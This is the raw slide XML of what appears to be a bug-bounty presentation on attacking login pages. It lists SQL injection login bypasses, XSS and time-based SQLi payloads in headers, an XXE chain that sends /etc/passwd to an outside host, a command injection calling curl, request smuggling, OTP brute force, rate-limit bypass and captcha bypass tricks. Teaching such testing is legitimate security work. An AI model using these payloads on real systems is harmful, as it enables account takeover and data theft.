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Lato"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
      <p:italic r:id="rId48"/>
      <p:boldItalic r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId50"/>
      <p:bold r:id="rId51"/>
      <p:italic r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular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La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53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-boldItalic.fntdata"/><Relationship Id="rId52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55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4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9ca7b4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9ca7b4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c76be528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c76be528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1fd553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1fd553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c76be52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c76be52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c5d3e08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c5d3e08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c76be528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c76be528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c76be5288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c76be5288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c76be528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c76be528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c5167e503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ac5167e503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a8f020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a8f020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c5d3e0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c5d3e0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a06c24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a06c24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c5167e503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ac5167e503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c5d3e08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c5d3e08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c76be528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c76be528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c89955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c89955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77e66a8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77e66a8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c76be528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c76be528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c7e856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c7e856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c5167e503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c5167e503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77e66a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77e66a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c5167e503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c5167e503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76be528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76be528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c89955f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c89955f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c89955f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c89955f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c89955f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c89955f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c89955f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c89955f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c89955f1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c89955f1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ad1bd7e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ad1bd7e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c5167e503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c5167e503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a340aeb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a340aeb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340aeb2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340aeb2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ac5167e503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ac5167e503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5167e50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5167e50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c76be528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c76be528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c76be528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c76be528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c76be528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c76be528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c76be528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c76be528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c76be52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c76be52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twitter.com/Corrupted_brain/status/1032200444607651840" TargetMode="External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70933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s://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=6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twitter.com/intigriti/status/1187349143678836737" TargetMode="External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10575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498052" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/867577" TargetMode="External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69460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86795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blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-bypassing-host-header-to-sql-7b9af997c610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hackerone.com/reports/275518" TargetMode="External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intigriti/status/1093468744079364096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www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/" TargetMode="External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twitter.com/SpiderSec/status/1251793902996279297" TargetMode="External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hackerone.com/reports/411723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hyperlink" Target="https://hackerone.com/reports/10811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gauravnarwani.com/cookie-worth-a-fortune/?replytocom=38" TargetMode="External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twitter.com/sudo_sudoka/status/1207517004413857792" TargetMode="External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s://twitter.com/random_robbie/status/1115612986951991298" TargetMode="External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76657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ustayready/fireprox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hackerone.com/reports/708917" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=it_V3ig1_4o" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/138863" TargetMode="External"/><Relationship Id="rId8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hyperlink" Target="https://medium.com/@arbazhussain/bypassing-rate-limit-protection-by-spoofing-originating-ip-ff06adf34157" TargetMode="External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170310" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/bounty-tip-easiest-way-to-bypass-apis-rate-limit-f984fad40093" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://avanishpathak46.medium.com/an-interesting-account-takeover-vulnerability-f5bf6a89152c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medium.com/swlh/tale-of-multiple-account-takeover-on-single-platform-19c019b1d1cb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hyperlink" Target="https://twitter.com/intigriti/status/1193872519368982528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twitter.com/AmitMDubey/status/1103646200903938050" TargetMode="External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hyperlink" Target="https://medium.com/@honeyakshat999/captcha-bypass-techniques-f768521516b2" TargetMode="External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hyperlink" Target="https://medium.com/@honeyakshat999/captcha-bypass-techniques-f768521516b2" TargetMode="External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hyperlink" Target="https://medium.com/@honeyakshat999/captcha-bypass-techniques-f768521516b2" TargetMode="External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hyperlink" Target="https://medium.com/@honeyakshat999/captcha-bypass-techniques-f768521516b2" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://medium.com/@honeyakshat999/captcha-bypass-techniques-f768521516b2" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://medium.com/secjuice/decode-bypass-captcha-9f17edf469b4" TargetMode="External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hyperlink" Target="https://hackerone.com/reports/386735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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/2421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hyperlink" Target="https://hackerone.com/reports/434715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hyperlink" Target="https://twitter.com/ADITYASHENDE17/status/1242191041005891584" TargetMode="External"/><Relationship Id="rId5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mit-lt.medium.com/yeah-first-time-i-found-time-based-sql-i-or-blind-sql-i-7e9a6e30b11a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hackerone.com/reports/982202" TargetMode="External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owasp.org/www-pdf-archive/GOD16-NOSQL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patrick-spiegel.de/MasterThesis.pdf" TargetMode="External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owasp.org/www-pdf-archive/GOD16-NOSQL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patrick-spiegel.de/MasterThesis.pdf" TargetMode="External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owasp.org/www-pdf-archive/GOD16-NOSQL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patrick-spiegel.de/MasterThesis.pdf" TargetMode="External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owasp.org/www-pdf-archive/GOD16-NOSQL.pdf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patrick-spiegel.de/MasterThesis.pdf" TargetMode="External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speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=6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Log</a:t>
            </a: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In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598450" y="1932263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Email Address OR Mobile Number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4571325" y="2584363"/>
            <a:ext cx="3916500" cy="511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Password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Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log In By Inserting e.g. \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||1# </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As Email AND Password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\</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>||1#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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XSS Payloads e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20onfocus%3djavascript:alert(%27xss%27)%20autofocus%20a=a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Email Parameter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%20onfocus%3djavascript:alert(%27xss%27)%20autofocus%20a=a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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4" name="Google Shape;344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Large String 50.000+ Characters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Numbers in Username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In Password Parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Cause Errors Exposing Sensitive Information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5" name="Google Shape;34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15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6" name="Google Shape;356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The Request To XML Body With XXE Payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. &lt;!ENTITY % b PUBLIC "lol" "file:///etc/passwd"&gt;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XXE.html Contains</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;!ENTITY % c "&lt;!ENTITY % rrr SYSTEM 'ftp://me.com/%b;'%3E%22%3E%c</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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standalone="yes"?&gt;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% b PUBLIC "lol" "file:///etc/passwd"&gt;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% asd PUBLIC "lol" "http://me.com/XXE.html%22%3E</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="10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%asd;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%rrr;]&gt;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&lt;login&gt;&lt;user&gt;me&lt;/user&gt;&lt;pass&gt;*****&lt;/pass&gt;&lt;/login&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr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000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Request Smuggling Transfer-Encoding: foo To Frontend That Looks at The Content-Length AND Transfer-Encoding: chunked To Backend That Stops Reading After The 0/r/n/r/n and everything after That Point is Interpreted</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as a Second Request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Content-Length: Number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Transfer-Encoding: foo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3e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email=me@gmail.com&amp;pass=*******&amp;captcha=Random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/r/n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373" name="Google Shape;3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000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Request Smuggling Frontend That Looks at The Content-Length AND Transfer-Encoding : chunked To Backend</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>That Stops Reading After The 0/r/n/r/n and everything after That Point is Interpreted</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as a Second Request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Content-Length: Number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 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3e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{"username":"me","password":"******","captcha":"Random"}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/r/n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6" name="Google Shape;396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000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Request Smuggling Frontend That Looks at The Content-Length AND Transfer-Encoding: chunked To Backend</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>That Stops Reading After The 0/r/n/r/n and everything after That Point is Interpreted</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as a Second Request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Content-Length: Number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3e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{"username":"me","password":"******","captcha":"Random"}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/r/n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8" name="Google Shape;408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SQLi Payloads e.g. ' AND '1' = '2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";WAITFOR DELAY '0.0.20'--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Blind XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In User-Agent OR Noun-Standard Headers e.g. X-Forwarded-Host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X-Forwarded-Host: ' AND '1' = '2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11" name="Google Shape;411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0" name="Google Shape;420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22" name="Google Shape;422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Blind XSS e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=//me.xss.ht&gt;&lt;/script&gt;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Time-Based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SQLi e.g. ";WAITFOR DELAY '0.0.20'-- </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In X-Forwarded-For Header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5" name="Google Shape;42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2" name="Google Shape;432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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Payloads e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/center&gt;&lt;script&gt;alert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(document.domain) &lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>True-Client-IP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Header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True-Client-IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/center&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;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37" name="Google Shape;437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8" name="Google Shape;43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'--' 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 "--"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In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Email OR Password To Bypass Authentication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user=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'--'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=*******&amp;captcha=Random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4" name="Google Shape;444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Next URL Parameter Try </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http:3627732462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https://www.google.com%ff@www.company.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Redirect User To Google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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nextURL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http:3627732462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49" name="Google Shape;449;p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0" name="Google Shape;45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0" name="Google Shape;460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Next URL Parameter Try To Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lol ';alert(document.domain)//lol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Get DOM-based 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1" name="Google Shape;4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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nextURL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lol ';alert(document.domain)//lol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63" name="Google Shape;463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4" name="Google Shape;46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0" name="Google Shape;470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2" name="Google Shape;472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!'&gt;&lt;svg/onload</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert('XSS')</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After Login Path To Get DOM-based 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3" name="Google Shape;4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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!'&gt;&lt;svg/onload</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert('XSS')</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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email=me&amp;password=*****************&amp;captcha=Random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75" name="Google Shape;475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6" name="Google Shape;47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2" name="Google Shape;482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4" name="Google Shape;484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***  </a:t>
            </a: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Curl As Part Of The Login</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get 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5" name="Google Shape;48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email=me&amp;password=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>**********</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>****</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;`curl me.com`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87" name="Google Shape;487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8" name="Google Shape;48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6" name="Google Shape;496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Log In By Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Your Email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Mobile Number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OTP Code</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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Try To Do Brute Force The OTP To GET ATO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7" name="Google Shape;4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phone=01**********&amp;otp=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>********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499" name="Google Shape;49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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force By Using IP Rotate Burp Suite Extension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Fireprox</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass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Rate Limits</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> That Based On Blocked IP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6" name="Google Shape;506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email=me@gmail.com&amp;password=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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0" name="Google Shape;51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2" name="Google Shape;51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6" name="Google Shape;516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Insert X-Forwarded-For Header One Time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Two Times</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass Rate Limits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22" name="Google Shape;522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X-Forwarded-For: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X-Forwarded-For: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email=me@gmail.com&amp;password=*********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3" name="Google Shape;523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4" name="Google Shape;524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6" name="Google Shape;5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8" name="Google Shape;52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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force On Password Parameter AND If There Is Too Many Requests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, Insert %00 In The Username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Email Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Rate Limits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4" name="Google Shape;534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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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5" name="Google Shape;535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6" name="Google Shape;536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8" name="Google Shape;5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41" name="Google Shape;541;p6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2" name="Google Shape;54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8" name="Google Shape;548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50" name="Google Shape;550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Log In By Using Your Email AND OTP  , Enter Correct Email AND OTP Code Then Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manipulate The Response To Change The Email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1" name="Google Shape;5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"email" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin@company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" ,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"code" : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>******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53" name="Google Shape;553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4" name="Google Shape;55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6" name="Google Shape;556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2" name="Google Shape;562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4" name="Google Shape;564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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Additional properties In The Request </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Gain Extra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Authorities OR Get More Functionalities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5" name="Google Shape;56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7" name="Google Shape;56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'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' ' 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' ' '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  AND If There Is Int Value , Try To Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' 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' Value'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' Value' '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  In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Email OR Password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user=me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=*******&amp;captcha=Random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HTTP Request Method To GET Instead Of POST </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Captcha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74" name="Google Shape;574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/logIn?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user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=me&amp;password=****&amp;captcha=Random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75" name="Google Shape;575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6" name="Google Shape;576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78" name="Google Shape;5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0" name="Google Shape;58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Remove Captcha Parameter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Captcha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86" name="Google Shape;586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r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /logIn?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user=me&amp;password=****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87" name="Google Shape;587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8" name="Google Shape;588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0" name="Google Shape;59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2" name="Google Shape;59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Reuse</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Old-Captcha </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Captcha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98" name="Google Shape;598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user=me&amp;password=****&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>captcha=Old-Random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9" name="Google Shape;599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2" name="Google Shape;60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4" name="Google Shape;60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JSON Body To Normal Body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Content Type Header From application/json To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> application/x-www-form-urlencoded </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Captcha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0" name="Google Shape;610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application/x-www-form-urlencoded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user=me&amp;password=****&amp;captcha=Random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2" name="Google Shape;612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4" name="Google Shape;6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6" name="Google Shape;61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U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>se Noun-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Headers e.g. X-Originating-IP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X-Client-IP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X-Remote-IP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X-Remote-Addr </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
